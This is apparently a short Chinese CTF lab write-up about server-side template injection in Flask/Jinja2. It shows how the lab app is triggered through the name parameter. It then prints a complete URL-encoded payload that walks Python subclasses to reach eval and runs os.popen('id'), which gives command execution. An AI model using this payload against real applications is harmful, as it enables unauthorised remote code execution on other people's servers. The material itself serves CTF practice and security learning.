【漏洞靶场】--Flask(Jinja2) 服务端模板注入漏洞

「已注销」

于 2022-01-06 16:01:22 发布

阅读量3.2k

点赞数

分类专栏： BMZCTF 文章标签： flask 安全 web安全

本文链接：https://blog.youkuaiyun.com/qq_41152432/article/details/122346260

版权

本文介绍了Flask应用中Jinja2模板引擎存在的服务端模板注入（SSTI）漏洞。通过访问特定URL（如?name=1），可以触发该漏洞，允许攻击者执行命令，例如查看应用的app.py文件内容。文章深入探讨了漏洞环境和构造payload的方法。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞环境

在这里插入图片描述

SSTI

访问?name=1，触发ssti漏洞。
在这里插入图片描述

payload

{%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}%20{%%20if%20c.__name__%20==%20%27catch_warnings%27%20%}%20{%%20for%20b%20in%20c.__init__.__globals__.values()%20%}%20{%%20if%20b.__class__%20==%20{}.__class__%20%}%20{%%20if%20%27eval%27%20in%20b.keys()%20%}%20{
  {%20b[%27eval%27](%27__import__(%22os%22).popen(%22id%22).read()%27)%20}}%20{%%20endif%20%}%20{%%20endif%20%}%20{%%20endfor%20%}%20{%%20endif%20%}%20{%%20endfor%20%}

在这里插入图片描述